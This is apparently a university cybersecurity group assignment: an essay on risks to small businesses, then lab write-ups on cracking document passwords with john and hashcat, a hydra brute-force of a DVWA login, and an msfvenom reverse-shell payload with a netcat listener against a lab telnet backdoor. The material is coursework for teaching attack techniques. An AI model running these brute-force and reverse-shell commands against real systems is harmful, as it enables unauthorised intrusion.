UNIVERSITI TUNKU ABDUL RAHMAN

FACULTY OF INFORMATION COMMUNICATION TECHNOLOGY

OCTOBER 2022 TRIMESTER

UCCN1223 CYBERSECURITY

GROUP ASSIGNMENT COVER SHEET

Student Name Student ID Practical Group Programme Marks

Wong Wai Chun 21ACB06087 P14 CS

Ong Zhan Wen 210ACB4076 P14 CS Part A:

Part B:
Sim Kah Hoe 210ACB6036 P14 CS Part C:
Part D:
Kaw Wei Xin 20ACB05200 P14 CS

1
Marking Scheme

Part A (5%)
Marks Allocated Marks Awarded

1. Introduction 1

2. Cyber security risks and threats 2

a. Identify and assess security risks, threats and
vulnerabilities
b. Prescribed procedures to evaluate risk levels and the
potential impact of threats and vulnerabilities on
SMEs

3. New proposal – Cybersecurity Strategy 2

a. Technical
b. Policy
c. Human
d. Cybersecurity Governance

TOTAL 5

Part B (5%)
File ID Marks Allocated Marks Awarded
1
File 1

File 2 1

File 3 1

File 4 1

File 5 1

TOTAL 5

Part C (5%)
File ID To-Do Marks Allocated Marks Awarded
Show nmap screenshots & explain 1
Step2
command
Write-up on hydra command 3
Step5
& parameter used
(+screenshots)
Step6 Show the password 1

2
TOTAL 5

3
 Part D (5%)
File ID To-Do Marks Allocated Marks Awarded
Show your writeup 1
Step1

Step2 Show the welcome message 1

Step3 Show the screenshots on msfvenom 1

Show how you start a netcat and 1
Step4
gain reverse shell
Step5 Show the final flag value 1

TOTAL 5
Title:Report on cyber security risks faced by SMEs and ways to overcome them

Introduction

The safety of information in the network environment and defense against cyber threats to
internet systems, including data, software, and hardware, is known as cybersecurity.
Cybersecurity is playing an important role in modern society. This is because people's daily
lives in contemporary society are dominated by the internet, and the workplace is the primary
location for internet use. Both large and small businesses need the internet to help with
operations and transactions, such as stock purchases. Cybersecurity is thus essential for
companies of all sizes, especially SMEs. This is because cybersecurity can help SMEs protect
Internet systems and defend against cyberthreats. However, because their cybersecurity is not
yet complete and robust enough, SMEs are frequently susceptible to several typical cyber
security risks, attacks, and vulnerabilities. Therefore, in this report, we are going to determine
the cyber security risks faced by SMEs and make a new proposal to overcome them.

Cyber security risks and threats face by SMEs

Phishing attacks
It is a type of attack that is used by hackers to steal users' data, including login credentials and
credit card numbers. Usually happens when the attacker poses as a trusted entity,such as
emails that come from reputable sources, which will then trick users into clicking malicious
links that causes the user info to be leaked to the attackers. Most attackers will trick SME
owners into clicking the suspicious links and cause their data to be taken or held ransom by
ransomwares which can only be removed by paying the attackers.

Data Breach
An incident where information is stolen from a system without permission or authorisation by
the system owners, in this case, is the SME owners. Most attacks are targeting SMEs as they
have a false sense of security on their cyber defenses. Furthermore, SME contains a huge
amount of user data which is very appealing to the attackers.

Supply Chain Attacks

Also known as value-chain or third party attacks. It happens when someone infiltrates a
system through an outside partner or provider with access into the victim’s data. The attacker
will slip in a malicious code or component into a trusted software, which is then sent out to
the victim. Later on, with a well timed command on the malicious code or component will
allow the attackers to intrude the system.

DDoS attack
DDoS attack also known as Distributed Denial of Service attack is a type of cyber threat
faced by SMEs as the attackers will attempt to disrupt the normal flow of traffic of the
servers or network service used by SMEs by overwhelming it with a sudden flood of Internet
traffic. It can increase its effectiveness by using many other compromised computer systems
as sources of network traffic.

5
Procedures to evaluate risk levels and the potential impact of threats and vulnerabilities
on SMEs

Identify Cyber Threats

An event which could and will cause harm to an organization, in this case, SMEs. Such
events include security breaches, DDoS attacks, malware, ransomware and so on. Different
types of events have their own different levels of threat. Some could be annoying such as the
pop out ads but some could be very dangerous as it involves stealing users data.

Identify Vulnerability
A potential weak point where attackers would utilize to get through the security defenses of a
system. Mostly due to not updating the antivirus software to the latest version in order to
keep up with the always new types of malware. Sometimes the vulnerability might be caused
due to human error or insider attack.

Identify and organize data storage based on risks

SMEs need to identify their most important and sensitive data in their system or server. By
using some reliable software, they can discover which data is most prone to an attack and
they can mitigate the damage of the attack by handling or storing it in a much safer
environment.

Taking action to mitigate risks

Once all vulnerabilities and loopholes are located in a system or server, it can be patched up
by adding firewalls, improving on a better antivirus software or updating the existing
software.

New proposal – Cybersecurity Strategy

6
Technical

One of the easiest and most effective way is to install anti-virus and anti-spy software on
every computer that have access to the business files and data. Anti-virus and anti-spy
software scan the computer thoroughly to identify any potential threats and malware and
remove them. As convenient as they are sometimes they do make mistakes such as
identifying the safe file to me malicious or missing out malicious files or software. To
improve the accuracy, the technician or the employee of the company can conduct a multiple
scan before deleting the files found to be malicious. The company also have to make sure that
the anti-virus and anti-spy software are always up to date, as the hackers / cyber criminals are
always on the move to improve their malware so the company should also be as on to date as
possible to prevent a newer malware enter the system. Some of the most common malware
are virus, worms , trojan horses and etc. Company should be always on the look out for these
common malwares.

On the other hand authentication method is also an option that require close to no cost at all.
Every computer should their own password to prevent collateral loses. From a cyber security
perspective, the longer and the more variety of different types of words is the harder it is for
the hacker to crack open the password. For example, alphabet has 26 letters if the user mix it
with capital and small letter the hacker has to try 52 different letters for each letter in the
password. If the password is 10 letters long the hacker will have to try
144,555,105,949,057,024 different combinations to get the correct one. The combinations
just get larger and larger if the company mix their passwords with numbers and special
symbols. To make the security even more solid, they can also enable multi-factor
authentication such as OTP or security questions. Biometric tools such as fingerprint, or
facial recognition are also a safe and convenient way to do authentication because every
fingerprint and facial feature is different.

Policy

All the computer or mobile devices connected to the company’s network and networked
resources must have anti-virus and anti-spy software installed and configured so that the
detection of the malicious files are always up to date by routinely updating the software.
These software must be actively running on the computer and devices. The anti-virus and
anti-spy software must not be disabled or bypassed by anyone other than IT experts or under
their supervision and approval. All the settings for the software must not be altered in anyway
that bypass certain malware or reduce the effectiveness of the software. Every file server
attached to the company network must be scanned and inspected by the IT department to
detect and delete the malwares that could potentially infect the company’s resources

Human

7
Every employee is required to have basic knowledge of cybersecurity. Employee should not
be downloading or using the computers that are connected to the company’s server for their
own personal stuff like social media, online shopping, etc. The company can also hire a third
party cybersecurity team in case the company is being hacked by a group of hackers. This can
help to reduce the loses or even prevent any lost.

Cybersecurity governance

A good Incident Response Plan (IRP) can help save a lof of time in the time of emergency.
Time is of essence when it comes to minimizng the lost of a cyber crime case. A good
Incident Response Plan can shorten the the process by half and sort the the situation
according instead of panicking and not solving the problem one by one, making sure the
company’s response is smooth and organized. The Incident Response Plan should be clear on
the steps for different cases such as data breach, insider threat or ransomware attack. One of
the steps in the incident response plan is assigning people / experts responsible for
discovering and eliminating the source of threat.

Secondly, the company must know how to identify their vulnerabilities. No matter how
perfect the cybersecurity teams the company hired their biggest vulnerabilities will always be
their employees. So the company should improve the overall cybersecurity
knowledge/awareness of the employee by training and educating them.

Conclusion

8
In a nutshell, SMEs have to prioritize their cyber security to defend themselves from
attacking hackers to prevent money and information loss. This is because SMEs are more
easily targeted and attacked by hackers due to SMEs' low attention to their cyber security and
that's the weakness of it. As technology becomes more and more advanced nowadays, the
technology and computing knowledge has been spread to the public. It is not weird that any
of the citizens in Malaysia can crack passwords anymore since a lot of knowledge and
information is posted around the Internet, especially on Google and YouTube which almost
everyone uses nowadays. With just a simple device that can access the Internet, people can
learn a lot of things including hacking knowledge. Cyber security is gradually becoming
important in our lives no matter for the people who browse on the Internet or enterprises
because all of us starting to store information and data on the Internet. As long as our data
exist on the Internet, there is a risk that our information, data, or even privacy will get
violated at any time. Hence, SMEs should not be underestimating the importance of cyber
security for their company since it will cause a great loss if it is neglected. I hope that this
report able to raise awareness of cyber security among SMEs and help them to prevent
further loss in the future.

File1.doc

9
Step 1: Hash the file1.doc.

Step 2: Using the command by setting the incremental mode = digits and length = 5 to crack the
password.

Password = 57913

File2.doc
Step 1: Hash and cat the file2.doc.

10
Step 2: Crack the password using command from john and set the incremental mode = upper and
length = 6.

Password = HJGYBN

11
File3.doc
Step 1: Hash and cat the file3.doc.

Step 2: Using command from john to crack the password by setting the incremental = alpha and
length = 6.

Password = SgIAvb

12
File4.doc
Step 1: Hash and cat the file4.doc.

Step 2: Use the command from john to decrypt the password by setting incremental mode = alnum
and length = 6.

Password = 9Akk6Z

13
File5.doc
Step 1: Hash and cat the file5.doc file.

Step 2: Start cracking the password using command on hashcat.

14
Password = *72@3#

15
Part C
Step 2:
First, we need to use $ifconfig command to find out our kali-linux server’s ip address.
Secondly, we use nmap ping scan command which is $nmap -sn 192.168.0.11/24 to perform
ping scan to kali-linux server for identify the ip address of avo-server. The 192.168.0.11/24
will tell the nmap to do ping scan from 192.168.0.0 to 102.168.0.255. We can see that there is
a nmap scan report that show us the avo-server ip address as 192.168.0.13.

After then we ping to the 192.168.0.13 to ensure kali-linux server can ping to the ip address.
($ping 192.168.0.13)

16
Step 5:
First, I enter hydra by the $hydra command to perform the brute-force attack. Secondly, I
type $find / -name "rockyou*" 2>/dev/null to find out where is the rockyou.txt file. Then, I
enter to directory /usr/share/wordlists which contain the rockyou.txt file by $cd command.
Next, I will use $ls command to list out all the files inside the directory. We can see that there
contain rockyou.txt.gz and then I use $gunzip rockyou.txt to extract out the rockyou.txt file.
After then, I use a command which $hydra -l admin -P rockyou.txt 192.168.0.13 http-post-
form “/dvwa/login.php:username=^USER^&password=^PASS^:Login failed” to
perform the brute-force attack to the dvwa login page. admin represent the user and
rockyou.txt represent wordlist which available for brute force attack and act as a password
list. 192.168.0.13 represent to the target IP address to perform brute force attack and http-
post-form which is the method for perform brute force attack on it. Lastly, dvwa/login.php
is the dvwa login url and username=^USER^&password=^PASS^ represent to the
parameter. While, Login failed which is the only error message when login is failed. After
perform the brute-attack force, hydra will show the possible valid password from the
rockyou.txt.

Here is the screenshot for the command used to perform brute-force attack.

17
18
Step 6
Since there are 16 valid passwords found, so we need try one by one. In the end, I found the
actual password for "admin" user is "password".

Successfully
Login with
username:
“admin” and password: “password

19
Part D: Exploiting Telnet

Step 1:
Narrow down the candidates for the server IP hosting the TELNET server by retrieving my
device IP address by using $ ifconfig.
Next, perform a nmap scan on the IP address of my device with $ nmap -sS 192.168.1.0/24
/24 is to restrict nmap to 24 bits and limit the scope of scanning between /0 to /255
Output below is the scan report from the command:

The IP address contains the most ports among all the IP address in the output, therefore it is
safe to assume that this IP hosts the TELNET server.
Attempting to probe this address, the command $ nmap -p- 192.168.0.192 is used to list
every port currently available in this IP address, including the hidden ports.

20
By comparing the current output with the first output, it becomes clear that the port with
value of 8015 or greater are the hidden ports. Therefore, it is feasible that the TELNET server
is among one of the hidden ports.

Step 2
To test whether the above assumption is correct, the command $ telnet 192.168.1.164 8015 is
used as an attempt to telnet to the server

A message is shown upon connecting.

AVO’S BACKDOOR. Type .HELP to view commands

Step 3
Generate a reverse shell payload with msfvenom command
$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.164 lport=2233 R

Step 4
Start reverse shell via telnet session on server with code $.RUN [output from msfvenom]
At the same time, start at netcat listener as well, to listen on the server with the code $ nc -
nvlp 2233
Connection to the Telnet server will be established once the reverse shell is activated.

21
Step 5
Extract the contents of the root.txt to receive the final flag with code $ cat root.txt
Output shown is the final flag value.

References

1. Small businesses are more at risk from phishing attacks: Ratcliff it. Ratcliff.
(n.d.). Retrieved November 20, 2022, from https://www.ratcliff.it/news/small-
businesses-risk-phishing-attacks

2. Small business cyber security and data breaches. Verizon Enterprise. (n.d.).
Retrieved November 20, 2022, from
https://www.verizon.com/business/resources/articles/small-business-cyber-security-
and-data-breaches/

3. What is a distributed denial-of-service (ddos) attack? - cloudflare. (n.d.).

Retrieved November 20, 2022, from https://www.cloudflare.com/learning/ddos/what-
is-a-ddos-attack/

4.Gillis, A. S. (2022, October 18). What is a supply chain attack? SearchSecurity.

Retrieved November 20, 2022, from
https://www.techtarget.com/searchsecurity/definition/supply-chain-attack

22
 5.Jefferson, B. (2022, November 25). How to perform an IT risk assessment. Lepide
Blog: A Guide to IT Security, Compliance and IT Operations. Retrieved November
22, 2022, from https://www.lepide.com/blog/how-to-perform-an-it-risk-assessment/

6.Small business cyber security and data breaches. Verizon Enterprise. (n.d.).
Retrieved November 20, 2022, from
https://www.verizon.com/business/resources/articles/small-business-cyber-security-
and-data-breaches/

7.PurpleSec. (n.d.). How To Build A Cyber Security Program For Small Business. [online] Available
at: https://purplesec.us/learn/cyber-security-program/ [Accessed 3 Nov. 2022].

23